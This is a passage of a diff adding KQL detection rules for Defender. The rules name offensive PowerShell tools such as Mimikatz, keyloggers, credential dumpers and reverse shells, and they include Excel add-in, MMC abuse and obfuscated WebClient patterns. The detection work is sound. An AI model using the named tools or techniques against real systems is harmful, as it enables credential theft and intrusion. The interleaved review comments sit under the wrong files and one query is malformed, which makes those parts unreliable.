endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith "\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith 
"\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith 
"\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerDPAPI.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath 
endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath 
endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\Veeam-Get-Creds.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1")
\ No newline at end of file
diff --git a/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql b/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql
new file mode 100644
index 00000000..2c66a4e1
--- /dev/null
+++ b/KQL/rules/Execution/microsoft_excel_add_in_loaded_from_uncommon_location.kql
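Review bot: The query has no ActionType filter, so despite the "FileCreation" title it also fires on FileDeleted, FileModified and FileRenamed rows for the same names; add `| where ActionType == "FileCreated"` (widen to `in~ ("FileCreated", "FileRenamed")` if renames into these names should also alert) before the path predicate. The roughly two hundred `FolderPath endswith` suffix matches can be collapsed into a single `FileName in~ (...)` list, since DeviceFileEvents exposes FileName separately, keeping only the `Invoke-Sharp` clause as a `FileName startswith "Invoke-Sharp" and FileName endswith ".ps1"` special case; that is both cheaper and easier to maintain. Note that this is a name-based IOC list: an operator who renames the script is not covered, which the rule header should say.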
@@ -0,0 +1,12 @@
+// Title: Microsoft Excel Add-In Loaded From Uncommon Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-12
+// Level: medium
+// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations
+
+DeviceImageLoadEvents
+| where (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Perflogs\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Tasks\\") and FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql b/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql
new file mode 100644
index 00000000..53a1c169
--- /dev/null
+++ b/KQL/rules/Execution/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft VBA For Outlook Addin Loaded Via Outlook
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: medium
+// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+// False Positives:
+// - Legitimate macro usage. Add the appropriate filter according to your environment
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\outlvba.dll" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/mmc20_lateral_movement.kql b/KQL/rules/Execution/mmc20_lateral_movement.kql
new file mode 100644
index 00000000..9118011c
--- /dev/null
+++ b/KQL/rules/Execution/mmc20_lateral_movement.kql
@@ -0,0 +1,12 @@
+// Title: MMC20 Lateral Movement
+// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)
+// Date: 2020-03-04
+// Level: high
+// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1021.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-Embedding" and FolderPath endswith "\\mmc.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql b/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql
new file mode 100644
index 00000000..d33c3002
--- /dev/null
+++ b/KQL/rules/Execution/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql
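Review bot: The parent check accepts any svchost.exe, whereas a DCOM activation of MMC20.Application is presumably serviced by the DcomLaunch service host; tightening the last predicate to `InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessCommandLine contains "DcomLaunch"` would cut noise from other svchost groups without losing the documented case. Since this is a lateral-movement rule, consider also projecting or joining the DeviceNetworkEvents inbound RPC/DCOM connection on the same device around the timestamp so an analyst can see the source host; the rule as written gives no attribution. Worth confirming the DcomLaunch assumption against a test activation before committing the filter.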
@@ -0,0 +1,13 @@
+// Title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.014, attack.t1036.002
+// False Positives:
+// - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
+// - Unconventional but non-malicious usage of RLO or reversed extensions.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cod.msc" or ProcessCommandLine contains "fdp.msc" or ProcessCommandLine contains "ftr.msc" or ProcessCommandLine contains "lmth.msc" or ProcessCommandLine contains "slx.msc" or ProcessCommandLine contains "tdo.msc" or ProcessCommandLine contains "xcod.msc" or ProcessCommandLine contains "xslx.msc" or ProcessCommandLine contains "xtpp.msc") and (FolderPath endswith "\\mmc.exe" or ProcessVersionInfoOriginalFileName =~ "MMC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql
new file mode 100644
index 00000000..368b43f0
--- /dev/null
+++ b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql
@@ -0,0 +1,14 @@
+// Title: MMC Loading Script Engines DLLs
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: medium
+// Description: Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt
+to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.005, attack.t1218.014
+// False Positives:
+// - Legitimate MMC operations or extensions loading these libraries
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\jscript9.dll") and InitiatingProcessFolderPath endswith "\\mmc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql b/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql
new file mode 100644
index 00000000..f617b3f4
--- /dev/null
+++ b/KQL/rules/Execution/named_pipe_created_via_mkfifo.kql
@@ -0,0 +1,10 @@
+// Title: Named Pipe Created Via Mkfifo
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: low
+// Description: Detects the creation of a new named pipe using the "mkfifo" utility
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where FolderPath endswith "/mkfifo"
\ No newline at end of file
diff --git a/KQL/rules/Execution/net_webclient_casing_anomalies.kql b/KQL/rules/Execution/net_webclient_casing_anomalies.kql
new file mode 100644
index 00000000..0917a37e
--- /dev/null
+++ b/KQL/rules/Execution/net_webclient_casing_anomalies.kql
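Review bot: The second line of the description, `to execute malicious scripts within a trusted system process ...`, is emitted without a `//` prefix, so the file is not a valid KQL query and will fail to parse when pasted into Advanced Hunting; it needs to read `// to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.`. This looks like the conversion script writing multi-line Sigma descriptions verbatim, so the same bug will recur on every rule with a folded description and is better fixed in the generator than by hand. Separately, the header says MMC is expected to load "vbscript, jscript etc", so the False Positives entry should note that legitimate MMC snap-ins which host script (for example ones built on the scripting host) will trip this, which is why Level stays medium.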
@@ -0,0 +1,10 @@ +// Title: Net WebClient Casing Anomalies +// Author: Florian Roth (Nextron Systems) +// Date: 2022-05-24 +// Level: high +// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAEIA" or ProcessCommandLine contains "OAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAYg" or 
ProcessCommandLine contains "4ARQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAYg" or ProcessCommandLine 
contains "4ARQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAQg" or ProcessCommandLine contains 
"OAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "uAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAEIA" or ProcessCommandLine contains "OAGUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBCA") 
and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql b/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql
new file mode 100644
index 00000000..8ac9c9e2
--- /dev/null
+++ b/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql
@@ -0,0 +1,12 @@
+// Title: Network Connection Initiated By Eqnedt32.EXE
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-14
+// Level: high
+// Description: Detects network connections from the Equation Editor process "eqnedt32.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\eqnedt32.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql b/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql
new file mode 100644
index 00000000..e211f769
--- /dev/null
+++ b/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Network Connection Initiated By Regsvr32.EXE
+// Author: Dmitriy Lifanov, oscd.community
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects a network connection initiated by "Regsvr32.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1559.001, attack.defense-evasion, attack.t1218.010
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/new_application_in_appcompat.kql b/KQL/rules/Execution/new_application_in_appcompat.kql
new file mode 100644
index 00000000..a149633e
--- /dev/null
